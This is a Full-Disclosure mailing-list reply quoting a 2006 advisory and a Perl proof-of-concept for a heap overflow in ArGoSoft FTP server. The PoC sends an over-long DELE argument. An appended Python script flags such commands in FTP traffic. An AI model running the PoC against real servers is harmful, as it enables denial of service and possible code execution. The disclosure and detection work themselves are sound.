Re: [Full-disclosure] ArGoSoft FTP server remote heap overflow

Subject: Re: [Full-disclosure] ArGoSoft FTP server remote heap overflow
Date: Sat, 25 Feb 2006 21:31:53 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
You forgot to message the programmer of it before the public.

/slap on you

;->

Jerome Athias wrote:
-- Title: ArGoSoft FTP server remote heap overflow

-- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and prior

-- Affected Vendor: ArGoSoft - http://www.argosoft.com

-- Impact: DoS, Arbitrary Code Execution

-- Where: From remote

-- Type: Heap Overflow

-- Vulnerability Details: A remote attacker with valid credentials
is able to trigger a heap overwrite in ArgoSoft FTP server. The bug
occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code
or launch a denial of service attack.

-- Credit: This vulnerability was discovered by Jerome Athias.
https://www.securinfos.info/english/




#!/usr/bin/perl
#
# ---------------------------------------------------- #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias                                        #
# ---------------------------------------------------- #

use strict;
use warnings;
use Net::FTP;

# getting data (argument order: host port debug user pass)
my $host  = $ARGV[0];
my $port  = $ARGV[1];
my $debug = $ARGV[2];
my $user  = $ARGV[3];
my $pass  = $ARGV[4];

# ===========

if (($host) && ($port)) {

    # make exploit string: one DELE command with a 3071-byte argument
    my $exploit_string = "DELE ";
    $exploit_string .= "A" x 2041;
    $exploit_string .= "B" x 4;
    $exploit_string .= "C" x 1026;

    #    On Win2K SP4 FR:
    #    EAX 42424241
    #    ECX 43434343
    #    EDX 43434342
    #    EBX 43434B73

    # ===================

    print "Trying to connect to $host:$port\n";
    # Net::FTP spells the option "Timeout"; the original "TimeOut" was silently ignored
    my $sock = Net::FTP->new("$host", Port => $port, Timeout => 30, Debug => $debug)
        or die "[-] Connection failed\n";
    print "[+] Connect OK!\n";
    print "Logging...\n";
    if (!$user) { $user = "test"; $pass = "test"; }
    $sock->login($user, $pass)
        or die "[-] Login failed: " . $sock->message;
    print "Sending string...\n";
    $sock->quot($exploit_string);
} else {
    # usage text now matches the order in which the arguments are actually read
    print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\n"
        . "Using: $0 host port [debug: 1 or 0] username password\n\n";
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





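The advisory quoted above says the overflow is reached through an over-long DELE argument. As an added example, not part of either post, here is a small Python check a defender could run over captured FTP control-channel lines (from a proxy, an IDS, or the server's own command log) to flag path-taking commands whose argument is far longer than any real filename or is a long run of one filler byte. The 512-byte threshold and the sample session are constructed assumptions for the demo.

```python
import re

# Assumed threshold: an argument longer than this is treated as anomalous
# (real paths are rarely this long; the PoC above sends 3071 bytes).
MAX_ARG_LEN = 512
# FTP commands that carry a path/name argument and are worth bounding.
PATH_COMMANDS = {"DELE", "RETR", "STOR", "CWD", "MKD", "RMD",
                 "RNFR", "RNTO", "LIST", "NLST", "SIZE", "MDTM"}
_CMD_RE = re.compile(r"^(?P<cmd>[A-Za-z]{3,4})(?:[ \t]+(?P<arg>.*))?$")
_RUN_RE = re.compile(r"(.)\1{63,}")  # 64+ identical bytes in a row

def parse_command(line):
    """Split one control-channel line into (COMMAND, argument), or None."""
    m = _CMD_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group("cmd").upper(), (m.group("arg") or "")

def check_command(line, max_len=MAX_ARG_LEN):
    """Finding for one line; suspicious when a path-taking command's
    argument is over-long or contains a long run of one filler byte."""
    parsed = parse_command(line)
    if parsed is None:
        return {"cmd": None, "arg_len": 0, "suspicious": False, "reasons": ["unparsed"]}
    cmd, arg = parsed
    reasons = []
    if cmd in PATH_COMMANDS and len(arg) > max_len:
        reasons.append("arg_len>%d" % max_len)
    if _RUN_RE.search(arg):
        reasons.append("filler_run")
    return {"cmd": cmd, "arg_len": len(arg), "suspicious": bool(reasons), "reasons": reasons}

def scan_session(lines, max_len=MAX_ARG_LEN):
    """Scan captured control-channel lines and keep only suspicious findings."""
    return [f for f in (check_command(l, max_len) for l in lines) if f["suspicious"]]

# Constructed sample session: a normal login, a benign DELE, and a DELE
# shaped like the PoC above (2041 'A', 4 'B', 1026 'C' after "DELE ").
SAMPLE_SESSION = [
    "USER test\r\n", "PASS test\r\n", "CWD /pub\r\n",
    "DELE report.txt\r\n",
    "DELE " + "A" * 2041 + "B" * 4 + "C" * 1026 + "\r\n",
    "QUIT\r\n",
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f["cmd"], f["arg_len"], ",".join(f["reasons"]))
```

Only the PoC-shaped DELE is reported; the benign login, CWD and DELE lines pass, so the same check can sit in front of any FTP daemon without tripping on normal traffic.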
